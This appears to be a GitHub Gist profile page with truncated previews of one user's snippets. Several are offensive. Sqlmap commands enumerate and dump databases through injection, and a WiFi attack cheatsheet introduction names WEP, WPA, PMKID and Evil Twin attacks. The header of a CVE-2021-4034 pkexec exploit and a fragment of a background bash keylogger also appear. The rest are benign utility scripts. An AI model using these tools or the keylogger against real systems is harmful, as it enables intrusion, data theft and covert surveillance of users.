Alfredo Casanova atcasanova

# Basic usage
./sqlmap.py -u "inject address" --dbs # enumerate databases
./sqlmap.py -u "inject address" --current-db # current database
./sqlmap.py -u "inject address" --users # enumerate database users
./sqlmap.py -u "inject address" --current-user # current user
./sqlmap.py -u "inject address" --tables -D "database" # enumerate the table names of the database
./sqlmap.py -u "inject address" --columns -T "table name" -D "database" # get the column names of the table
./sqlmap.py -u "inject address" --dump -C "field, field" -T "table name" -D "database" # dump the data in the listed columns of the table
atcasanova / wifi-cheatsheet.md
Created May 23, 2023 12:56
wifi pentest cheatsheet

Step-by-Step Guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin Attacks

WiFi penetration testing is a critical component of network security, aiming to identify vulnerabilities in wireless networks and implement appropriate security measures.

Our WiFi penetration testing cheatsheet covers various techniques and methodologies targeting WEP, WPA, WPA2, and WPA3 encryption standards.

Essential Tools for WiFi Penetration Testing

Here are some popular automated tools for WiFi penetration testing that will be invaluable for your WiFi penetration testing cheatsheet:

atcasanova / blasty-vs-pkexec.c
Created January 26, 2022 13:05
blasty-vs-pkexec
/*
* blasty-vs-pkexec.c -- by blasty <peter@haxx.in>
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
atcasanova / disable webcam
Created January 20, 2022 14:15
Disable integrated webcam on linux
# print each USB device identifier followed by its product name
for device in /sys/bus/usb/devices/*/product; do
    echo "$device: " | cut -f6 -d/ | tr '\n' ' '; cat "$device"
done
locate the identifier for your device and:
echo '1-5' | sudo tee /sys/bus/usb/drivers/usb/unbind
where 1-5 is the identifier
to enable it again:
#!/bin/bash
# split the ;-separated record passed as the first argument
IFS=\; read -r nome email empresa telefone <<< "$1"
filename="$(sha256sum <<< "$email" | cut -f1 -d" ").txt"
echo "Nome: $nome
E-Mail: $email
Empresa: $empresa
Telefone: $telefone" > "$filename"
#!/bin/bash
while read line; do
    # assign data to the variables
    nome=$(echo "$line" | cut -f1 -d";")
    email=$(echo "$line" | cut -f2 -d";")
    empresa=$(echo "$line" | cut -f3 -d";")
    telefone=$(echo "$line" | cut -f4 -d";")
    filename="$(echo -n "$email" | sha256sum | cut -f1 -d" ").txt"
    # build the file
#!/bin/bash
while IFS=\; read -r nome email empresa telefone; do
    filename="$(sha256sum <<< "$email" | cut -f1 -d" ").txt"
    # build the file
    echo "Nome: $nome
E-Mail: $email
Empresa: $empresa
Telefone: $telefone" > "$filename"
done < data.csv
atcasanova / keylogger.sh
Created September 19, 2019 19:04
simple no-root bash keylogger (easier than you thought)
#!/bin/bash
# you'll have to get your keyboard id from xinput --list
# then start it like nohup ./keyboard.sh & and write down the pid
# shown. When you're done, just kill $pid and it will print the recorded
# keystrokes
handler(){
killall -9 xinput
while read line; do
sed "s|$line|${mapa[$line]}|" <<< $line
atcasanova / gist:4718816bd627bdc6686d6e89c7ac01d1
Last active June 3, 2020 17:37
Cedilla on ubuntu 18.04 64 bits with american keyboard
Enabling cedilla and dead keys on kali linux
change:
"cedilla" "Cedilla" "gtk20" "/usr/share/locale" "az:ca:co:fr:gv:oc:pt:sq:tr:wa"
to
"cedilla" "Cedilla" "gtk20" "/usr/share/locale" "az:ca:co:fr:gv:oc:pt:sq:tr:wa:en"
on these files:
/usr/lib/x86_64-linux-gnu/gtk-3.0/3.0.0/immodules.cache
/usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/immodules.cache
atcasanova / checksubnet.sh
Last active October 17, 2019 13:53
Script to check whether one ip/subnet is within another ip/subnet
#!/bin/bash
(( $# != 2 )) && {
echo "uso: ./$0 10.0.0.0/8 10.10.10.10/24"
exit 1
}
IFS="/" read ip1 mask1 <<< $1
IFS="/" read ip2 mask2 <<< $2
size=$mask1
readarray -d'.' -t first <<< $ip1
readarray -d'.' -t second <<< $ip2